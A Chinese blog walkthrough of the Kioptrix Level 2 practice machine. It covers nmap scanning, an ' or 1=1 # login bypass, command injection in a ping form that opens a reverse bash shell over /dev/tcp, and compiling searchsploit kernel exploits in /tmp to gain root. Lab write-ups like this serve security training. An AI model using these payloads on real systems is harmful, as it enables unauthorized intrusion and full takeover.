Kioptrix Level 2靶机

Kioptrix Level 2靶机

一、信息搜集

1.主机发现

namp -sP 192.168.189.129/24 -T5

在这里插入图片描述

2.全端口扫描,服务版本探测

nmap -sS -sV -p- 192.168.189.135

在这里插入图片描述

发现80端口存在http服务,我们尝试访问

在这里插入图片描述

二、漏洞利用

1、万能密码登录

发现一个登陆页面,发现万能密码可以绕过登陆验证

' or 1=1 #

在这里插入图片描述

查看源代码发现html页面不完整:

在这里插入图片描述

我们手动修补后发现了一个ping的功能,且存在命令执行,但是没有找到nc,我们反弹一个bash回来:

在这里插入图片描述

在这里插入图片描述

2、反弹shell

127.0.0.1 | bash -c 'exec bash -i &>/dev/tcp/192.168.189.129/5566 <&1'

在这里插入图片描述

三、后渗透

1.信息搜集

查看内核版本信息,搜索历史漏洞

uname -a
lsb_release -a   # 查看版本信息

在这里插入图片描述

在这里插入图片描述

searchsploit 2.6.9 linux | grep Privilege
searchsploit centos 4.5 | grep Privilege

发现可利用的提权exp:编号1397,9542

在这里插入图片描述

在这里插入图片描述

2.权限提升

[!NOTE]

kali中的gcc版本太高可能无法编译成功,我们可将源码下载到目标机器进行编译

开启微服务:

python -m http.server

/tmp目录有读写执行权限,下载到这个目录

在这里插入图片描述

编译:

gcc -o k-rad3 1397.c -static -O2

执行后提示失败,内核版本不匹配!

我们尝试编号9542:

在这里插入图片描述
提权成功!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值